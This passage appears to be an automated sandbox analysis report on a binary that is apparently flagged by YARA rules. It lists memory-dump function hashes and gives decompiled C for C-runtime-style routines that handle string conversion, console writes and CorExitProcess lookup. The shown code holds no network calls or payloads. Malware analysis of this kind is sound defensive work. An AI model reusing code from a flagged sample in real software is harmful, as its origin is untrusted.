                                                                                              • Instruction ID: 6f34248949844e2c376e7b8e67ef769285199c89e02b7ebacbb10d2425ea643d
                                                                                              • Opcode Fuzzy Hash: 693b7c54016a59cdbfed5bf97d611671327a7796b2b33607a59a4987e9e37b45
                                                                                              • Instruction Fuzzy Hash: 40F0F6352086459FC606CB04D980B26FBE2EB89718F24C6A9E9490B762C737E813DA81
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00BDC73C, Relevance: .0, Instructions: 30COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385879081.0000000000BDB000.00000040.00000040.sdmp, Offset: 00BDB000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 091658e8dbf900f1224d35babd2a43cc459355af0c54a659b0d131af83b613b9
                                                                                              • Instruction ID: ac9ddd7b05dadcf26f2df98febc64bc3b38dc1962673cf93602c9a159278b1d5
                                                                                              • Opcode Fuzzy Hash: 091658e8dbf900f1224d35babd2a43cc459355af0c54a659b0d131af83b613b9
                                                                                              • Instruction Fuzzy Hash: 24F01935204645DFC206CF00D980B25FBA2FB89718F24C6ADE9480B752C7379813DA81
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00BD05F6, Relevance: .0, Instructions: 27COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385758130.0000000000BD0000.00000040.00000040.sdmp, Offset: 00BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d994b03746fe6991bf11f327cf0b581eecfb579df442d623a8a696e4c7e973e8
                                                                                              • Instruction ID: fcd0402c2c9165954616f4b251b5ac971664a23baba141562460f36a79ee5ac8
                                                                                              • Opcode Fuzzy Hash: d994b03746fe6991bf11f327cf0b581eecfb579df442d623a8a696e4c7e973e8
                                                                                              • Instruction Fuzzy Hash: 30E06DB66006045B9650CF0AEC81452F7E8EB84630B08C46BDC0D8B701E536B5098AA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00AEAE3B, Relevance: .0, Instructions: 26COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385240715.0000000000AE2000.00000040.00000001.sdmp, Offset: 00AE2000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: aef603e195e0cc278bc21fe8c12933aaab43e1db84ef45e1c95829f10d892589
                                                                                              • Instruction ID: 81caddfcd9efd1130140b8817394ca554694fa6b8c65c21a96453b5a68c09895
                                                                                              • Opcode Fuzzy Hash: aef603e195e0cc278bc21fe8c12933aaab43e1db84ef45e1c95829f10d892589
                                                                                              • Instruction Fuzzy Hash: 1FE0D8B25412046BD2509E0AEC45F12FB58EB40A30F04C567ED091F302E172B5148AF1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 067B1577, Relevance: .0, Instructions: 26COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.390474594.00000000067B0000.00000040.00000001.sdmp, Offset: 067B0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b49e1de41cbc8d1953e267d3cad139d81fd46e2f751d57fcf5bdc9e5439edd6d
                                                                                              • Instruction ID: a3a872b5866bfca44896708000af3502b992c7c7b27b373ff8c16b74c1997cbe
                                                                                              • Opcode Fuzzy Hash: b49e1de41cbc8d1953e267d3cad139d81fd46e2f751d57fcf5bdc9e5439edd6d
                                                                                              • Instruction Fuzzy Hash: 52E012B25512046BD6509E0AAC45B52FB98EB80A30F04C566ED0D5E702E176A5148AB5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 067B1263, Relevance: .0, Instructions: 26COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.390474594.00000000067B0000.00000040.00000001.sdmp, Offset: 067B0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 31083f43a6350f52c2452ad244908c350045f8c364e7df63a8e4e99e4b5e08a1
                                                                                              • Instruction ID: 6fb0d2c6dbf28b43534225d7f4a3f57c3c836cef8214cbaec4b340c55d82a5cc
                                                                                              • Opcode Fuzzy Hash: 31083f43a6350f52c2452ad244908c350045f8c364e7df63a8e4e99e4b5e08a1
                                                                                              • Instruction Fuzzy Hash: 46E048B25513046BE6509F0AEC45F52FB58EB80A30F04C567ED095F742E176B5148AF5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 067B1B53, Relevance: .0, Instructions: 26COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.390474594.00000000067B0000.00000040.00000001.sdmp, Offset: 067B0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4c31156f77bf7e1b2ada0242435dffa461ae0bb9ba33190635d6c290e6a7235c
                                                                                              • Instruction ID: fe3d2dc9c47b178b9ca39eaac269547e4ff892f450f569713a8762776ef79647
                                                                                              • Opcode Fuzzy Hash: 4c31156f77bf7e1b2ada0242435dffa461ae0bb9ba33190635d6c290e6a7235c
                                                                                              • Instruction Fuzzy Hash: BAE0D8B25013046BD6509E0AEC85F13FF98EB40A30F04C467ED0D1F302E172B5148AF1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 067B1CCB, Relevance: .0, Instructions: 26COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.390474594.00000000067B0000.00000040.00000001.sdmp, Offset: 067B0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f7341f9aa883134de7f4c9658a72f92d558e3904e68fb936aed00ff98ee9e048
                                                                                              • Instruction ID: 01b1cfdaf976523f76bfe3f85c3a55d95f601127a5453a03ca2147b7e42d54f7
                                                                                              • Opcode Fuzzy Hash: f7341f9aa883134de7f4c9658a72f92d558e3904e68fb936aed00ff98ee9e048
                                                                                              • Instruction Fuzzy Hash: 94E0D8B25513046BD7508E0AEC45F12FF98EB80A30F04C467ED081F302E076B5148AF1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00AC23F4, Relevance: .0, Instructions: 15COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385056435.0000000000AC2000.00000040.00000001.sdmp, Offset: 00AC2000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6c4e97b6b26e63e442ca63bdf1315f19e642ad6004b2878c4082b5e1430e3d88
                                                                                              • Instruction ID: 13137609aa8f4077cc25299573d3aee16a6c235b5e82f99b881742b70a1778dc
                                                                                              • Opcode Fuzzy Hash: 6c4e97b6b26e63e442ca63bdf1315f19e642ad6004b2878c4082b5e1430e3d88
                                                                                              • Instruction Fuzzy Hash: 96D05EB9244A814FD32A8B1CC2A4F953BE4EF51B04F4784FDA8008B6A3C778D981D300
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00AC23BC, Relevance: .0, Instructions: 14COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385056435.0000000000AC2000.00000040.00000001.sdmp, Offset: 00AC2000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d5b8c252bdc6dca1fdedd5caed70754efdb441ab6121727a891a10c0dbcf37a3
                                                                                              • Instruction ID: ac2c9ccde277c088d9dc54ffa302c7706df85aa02eaf77170f73fd8518dafcc3
                                                                                              • Opcode Fuzzy Hash: d5b8c252bdc6dca1fdedd5caed70754efdb441ab6121727a891a10c0dbcf37a3
                                                                                              • Instruction Fuzzy Hash: ADD05E743002814BD715DB1CC294F5937D4AB40B00F0644ECAC008F362C7B8EC81C700
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Non-executed Functions

                                                                                              Function 004078CF, Relevance: 12.2, APIs: 8, Instructions: 216COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 70%
                                                                                              			E004078CF(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t56;
				signed int _t58;
				short* _t60;
				signed int _t64;
				short* _t68;
				int _t76;
				short* _t79;
				signed int _t85;
				signed int _t88;
				void* _t93;
				void* _t94;
				int _t96;
				short* _t99;
				int _t101;
				int _t103;
				signed int _t104;
				short* _t105;
				void* _t108;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x412014; // 0x8e1d7674
				_v8 = _t49 ^ _t104;
				_t101 = _a20;
				if(_t101 > 0) {
					_t76 = E004080D8(_a16, _t101);
					_t108 = _t76 - _t101;
					_t4 = _t76 + 1; // 0x1
					_t101 = _t4;
					if(_t108 >= 0) {
						_t101 = _t76;
					}
				}
				_t96 = _a32;
				if(_t96 == 0) {
					_t96 =  *( *_a4 + 8);
					_a32 = _t96;
				}
				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					E004018CC();
					return _t54;
				} else {
					_t93 = _t54 + _t54;
					_t83 = _t93 + 8;
					asm("sbb eax, eax");
					if((_t93 + 0x00000008 & _t54) == 0) {
						_t79 = 0;
						__eflags = 0;
						L14:
						if(_t79 == 0) {
							L36:
							_t103 = 0;
							L37:
							E004063D5(_t79);
							_t54 = _t103;
							goto L38;
						}
						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
						_t119 = _t56;
						if(_t56 == 0) {
							goto L36;
						}
						_t98 = _v12;
						_t58 = E00405989(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
						_t103 = _t58;
						if(_t103 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t94 = _t103 + _t103;
							_t85 = _t94 + 8;
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							__eflags = _t85 & _t58;
							if((_t85 & _t58) == 0) {
								_t99 = 0;
								__eflags = 0;
								L30:
								__eflags = _t99;
								if(__eflags == 0) {
									L35:
									E004063D5(_t99);
									goto L36;
								}
								_t60 = E00405989(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
								__eflags = _t60;
								if(_t60 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
								__eflags = _t103;
								if(_t103 != 0) {
									E004063D5(_t99);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t88 = _t94 + 8;
							__eflags = _t94 - _t88;
							asm("sbb eax, eax");
							_t64 = _t58 & _t88;
							_t85 = _t94 + 8;
							__eflags = _t64 - 0x400;
							if(_t64 > 0x400) {
								__eflags = _t94 - _t85;
								asm("sbb eax, eax");
								_t99 = E00403E3D(_t85, _t64 & _t85);
								_pop(_t85);
								__eflags = _t99;
								if(_t99 == 0) {
									goto L35;
								}
								 *_t99 = 0xdddd;
								L28:
								_t99 =  &(_t99[4]);
								goto L30;
							}
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							E004018E0();
							_t99 = _t105;
							__eflags = _t99;
							if(_t99 == 0) {
								goto L35;
							}
							 *_t99 = 0xcccc;
							goto L28;
						}
						_t68 = _a28;
						if(_t68 == 0) {
							goto L37;
						}
						_t123 = _t103 - _t68;
						if(_t103 > _t68) {
							goto L36;
						}
						_t103 = E00405989(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
						if(_t103 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t70 = _t54 & _t93 + 0x00000008;
					_t83 = _t93 + 8;
					if((_t54 & _t93 + 0x00000008) > 0x400) {
						__eflags = _t93 - _t83;
						asm("sbb eax, eax");
						_t79 = E00403E3D(_t83, _t70 & _t83);
						_pop(_t83);
						__eflags = _t79;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t79 = 0xdddd;
						L12:
						_t79 =  &(_t79[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E004018E0();
					_t79 = _t105;
					if(_t79 == 0) {
						goto L36;
					}
					 *_t79 = 0xcccc;
					goto L12;
				}
			}


























                                                                                              0x004078d4
                                                                                              0x004078d5
                                                                                              0x004078d6
                                                                                              0x004078dd
                                                                                              0x004078e2
                                                                                              0x004078e8
                                                                                              0x004078ee
                                                                                              0x004078f4
                                                                                              0x004078f7
                                                                                              0x004078f7
                                                                                              0x004078fa
                                                                                              0x004078fc
                                                                                              0x004078fc
                                                                                              0x004078fa
                                                                                              0x004078fe
                                                                                              0x00407903
                                                                                              0x0040790a
                                                                                              0x0040790d
                                                                                              0x0040790d
                                                                                              0x00407929
                                                                                              0x0040792f
                                                                                              0x00407934
                                                                                              0x00407ac7
                                                                                              0x00407ad2
                                                                                              0x00407ada
                                                                                              0x0040793a
                                                                                              0x0040793a
                                                                                              0x0040793d
                                                                                              0x00407942
                                                                                              0x00407946
                                                                                              0x0040799a
                                                                                              0x0040799a
                                                                                              0x0040799c
                                                                                              0x0040799e
                                                                                              0x00407abc
                                                                                              0x00407abc
                                                                                              0x00407abe
                                                                                              0x00407abf
                                                                                              0x00407ac5
                                                                                              0x00000000
                                                                                              0x00407ac5
                                                                                              0x004079af
                                                                                              0x004079b5
                                                                                              0x004079b7
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004079bd
                                                                                              0x004079cf
                                                                                              0x004079d4
                                                                                              0x004079d8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004079e5
                                                                                              0x00407a1f
                                                                                              0x00407a22
                                                                                              0x00407a25
                                                                                              0x00407a27
                                                                                              0x00407a29
                                                                                              0x00407a2b
                                                                                              0x00407a77
                                                                                              0x00407a77
                                                                                              0x00407a79
                                                                                              0x00407a79
                                                                                              0x00407a7b
                                                                                              0x00407ab5
                                                                                              0x00407ab6
                                                                                              0x00000000
                                                                                              0x00407abb
                                                                                              0x00407a8f
                                                                                              0x00407a94
                                                                                              0x00407a96
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407a9a
                                                                                              0x00407a9b
                                                                                              0x00407a9c
                                                                                              0x00407a9f
                                                                                              0x00407adb
                                                                                              0x00407ade
                                                                                              0x00407aa1
                                                                                              0x00407aa1
                                                                                              0x00407aa2
                                                                                              0x00407aa2
                                                                                              0x00407aaf
                                                                                              0x00407ab1
                                                                                              0x00407ab3
                                                                                              0x00407ae4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407ab3
                                                                                              0x00407a2d
                                                                                              0x00407a30
                                                                                              0x00407a32
                                                                                              0x00407a34
                                                                                              0x00407a36
                                                                                              0x00407a39
                                                                                              0x00407a3e
                                                                                              0x00407a59
                                                                                              0x00407a5b
                                                                                              0x00407a65
                                                                                              0x00407a67
                                                                                              0x00407a68
                                                                                              0x00407a6a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407a6c
                                                                                              0x00407a72
                                                                                              0x00407a72
                                                                                              0x00000000
                                                                                              0x00407a72
                                                                                              0x00407a40
                                                                                              0x00407a42
                                                                                              0x00407a46
                                                                                              0x00407a4b
                                                                                              0x00407a4d
                                                                                              0x00407a4f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407a51
                                                                                              0x00000000
                                                                                              0x00407a51
                                                                                              0x004079e7
                                                                                              0x004079ec
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004079f2
                                                                                              0x004079f4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407a10
                                                                                              0x00407a14
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407a1a
                                                                                              0x0040794d
                                                                                              0x0040794f
                                                                                              0x00407951
                                                                                              0x00407959
                                                                                              0x00407978
                                                                                              0x0040797a
                                                                                              0x00407984
                                                                                              0x00407986
                                                                                              0x00407987
                                                                                              0x00407989
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040798f
                                                                                              0x00407995
                                                                                              0x00407995
                                                                                              0x00000000
                                                                                              0x00407995
                                                                                              0x0040795d
                                                                                              0x00407961
                                                                                              0x00407966
                                                                                              0x0040796a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407970
                                                                                              0x00000000
                                                                                              0x00407970

                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00407B20,?,?,00000000), ref: 00407929
                                                                                              • __alloca_probe_16.LIBCMT ref: 00407961
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00407B20,?,?,00000000,?,?,?), ref: 004079AF
                                                                                              • __alloca_probe_16.LIBCMT ref: 00407A46
                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00407AA9
                                                                                              • __freea.LIBCMT ref: 00407AB6
                                                                                                • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                                                                                              • __freea.LIBCMT ref: 00407ABF
                                                                                              • __freea.LIBCMT ref: 00407AE4
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000001.306979725.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000A.00000001.307043885.0000000000414000.00000040.00020000.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 3864826663-0
                                                                                              • Opcode ID: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
                                                                                              • Instruction ID: 2b56c59f559f8582b2a4feb05c221e86bbfe0f9b068744966d06d01a738823cf
                                                                                              • Opcode Fuzzy Hash: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
                                                                                              • Instruction Fuzzy Hash: 8051D572B04216ABDB259F64CC41EAF77A9DB40760B15463EFC04F62C1DB38ED50CAA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00408223, Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 72%
                                                                                              			E00408223(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __ebx;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t93;
				long _t96;
				void _t104;
				void* _t111;
				signed int _t115;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t136;
				signed int _t138;
				void* _t139;

				_t78 =  *0x412014; // 0x8e1d7674
				_v8 = _t78 ^ _t138;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t115 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x4130a0 + _t118 * 4)) + _t115 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t136 = _a4;
				_v60 = _t86;
				 *_t136 = 0;
				 *((intOrPtr*)(_t136 + 4)) = 0;
				 *((intOrPtr*)(_t136 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x4130a0 + _v48 * 4));
					_t123 =  *(_t129 + _t115 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E00405FC6(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
							} else {
								_t111 = E00407222( &_v28, _t133, 2);
								_t139 = _t139 + 0xc;
								if(_t111 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t115 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t93 = E00407222();
						_t139 = _t139 + 0xc;
						if(_t93 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t96;
							if(_t96 != 0) {
								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
									L19:
									 *_t136 = GetLastError();
								} else {
									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t104 = 0xd;
											_v32 = _t104;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				E004018CC();
				return _t136;
			}



































                                                                                              0x0040822b
                                                                                              0x00408232
                                                                                              0x00408235
                                                                                              0x0040823d
                                                                                              0x00408241
                                                                                              0x0040824d
                                                                                              0x00408250
                                                                                              0x00408253
                                                                                              0x0040825a
                                                                                              0x00408262
                                                                                              0x00408265
                                                                                              0x0040826b
                                                                                              0x00408271
                                                                                              0x00408276
                                                                                              0x00408278
                                                                                              0x0040827b
                                                                                              0x00408280
                                                                                              0x0040828a
                                                                                              0x00408291
                                                                                              0x00408294
                                                                                              0x0040829b
                                                                                              0x004082a2
                                                                                              0x004082ce
                                                                                              0x004082f4
                                                                                              0x004082f6
                                                                                              0x00000000
                                                                                              0x004082d0
                                                                                              0x004082d3
                                                                                              0x0040839a
                                                                                              0x004083a6
                                                                                              0x004083b1
                                                                                              0x004083b6
                                                                                              0x004082d9
                                                                                              0x004082e0
                                                                                              0x004082e5
                                                                                              0x004082eb
                                                                                              0x004082f1
                                                                                              0x00000000
                                                                                              0x004082f1
                                                                                              0x004082eb
                                                                                              0x004082d3
                                                                                              0x004082a4
                                                                                              0x004082a8
                                                                                              0x004082ab
                                                                                              0x004082b1
                                                                                              0x004082b3
                                                                                              0x004082b6
                                                                                              0x004082ba
                                                                                              0x004082f7
                                                                                              0x004082fa
                                                                                              0x004082fb
                                                                                              0x00408300
                                                                                              0x00408306
                                                                                              0x0040830c
                                                                                              0x0040831b
                                                                                              0x00408321
                                                                                              0x00408327
                                                                                              0x0040832c
                                                                                              0x00408348
                                                                                              0x004083bb
                                                                                              0x004083c1
                                                                                              0x0040834a
                                                                                              0x00408352
                                                                                              0x0040835b
                                                                                              0x00408361
                                                                                              0x00000000
                                                                                              0x00408363
                                                                                              0x00408365
                                                                                              0x00408368
                                                                                              0x00408381
                                                                                              0x00000000
                                                                                              0x00408383
                                                                                              0x00408387
                                                                                              0x00408389
                                                                                              0x0040838c
                                                                                              0x00000000
                                                                                              0x0040838c
                                                                                              0x00408387
                                                                                              0x00408381
                                                                                              0x00408361
                                                                                              0x0040835b
                                                                                              0x00408348
                                                                                              0x0040832c
                                                                                              0x00408306
                                                                                              0x00000000
                                                                                              0x0040838f
                                                                                              0x0040838f
                                                                                              0x004083c3
                                                                                              0x004083cd
                                                                                              0x004083d5

                                                                                              APIs
                                                                                              • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00408998,?,00000000,?,00000000,00000000), ref: 00408265
                                                                                              • __fassign.LIBCMT ref: 004082E0
                                                                                              • __fassign.LIBCMT ref: 004082FB
                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00408321
                                                                                              • WriteFile.KERNEL32(?,?,00000000,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408340
                                                                                              • WriteFile.KERNEL32(?,?,00000001,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408379
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000001.306979725.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000A.00000001.307043885.0000000000414000.00000040.00020000.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                              • String ID:
                                                                                              • API String ID: 1324828854-0
                                                                                              • Opcode ID: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
                                                                                              • Instruction ID: d35ea3bc0149cbeaf608d2e35f82b202305ea3b4574a465905668c698b2cd014
                                                                                              • Opcode Fuzzy Hash: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
                                                                                              • Instruction Fuzzy Hash: 2751C070900209EFCB10CFA8D985AEEBBF4EF49300F14816EE995F3391DA349941CB68
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00403632, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 27%
                                                                                              			E00403632(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _t10;
				int _t12;
				int _t18;
				signed int _t20;

				_t10 =  *0x412014; // 0x8e1d7674
				_v8 = _t10 ^ _t20;
				_v12 = _v12 & 0x00000000;
				_t12 =  &_v12;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
				if(_t12 != 0) {
					_t12 = GetProcAddress(_v12, "CorExitProcess");
					_t18 = _t12;
					if(_t18 != 0) {
						E0040C15C();
						_t12 =  *_t18(_a4);
					}
				}
				if(_v12 != 0) {
					_t12 = FreeLibrary(_v12);
				}
				E004018CC();
				return _t12;
			}









                                                                                              0x00403639
                                                                                              0x00403640
                                                                                              0x00403643
                                                                                              0x00403647
                                                                                              0x00403652
                                                                                              0x0040365a
                                                                                              0x00403665
                                                                                              0x0040366b
                                                                                              0x0040366f
                                                                                              0x00403676
                                                                                              0x0040367c
                                                                                              0x0040367c
                                                                                              0x0040367e
                                                                                              0x00403683
                                                                                              0x00403688
                                                                                              0x00403688
                                                                                              0x00403693
                                                                                              0x0040369b

                                                                                              APIs
                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002), ref: 00403652
                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00403665
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002,00000000), ref: 00403688
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000001.306979725.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000A.00000001.307043885.0000000000414000.00000040.00020000.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                              • API String ID: 4061214504-1276376045
                                                                                              • Opcode ID: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
                                                                                              • Instruction ID: 2a5f1b52f49e2644cdc997ca28138b4c7ff7fe3d24fc8903f8dd75b8825c5772
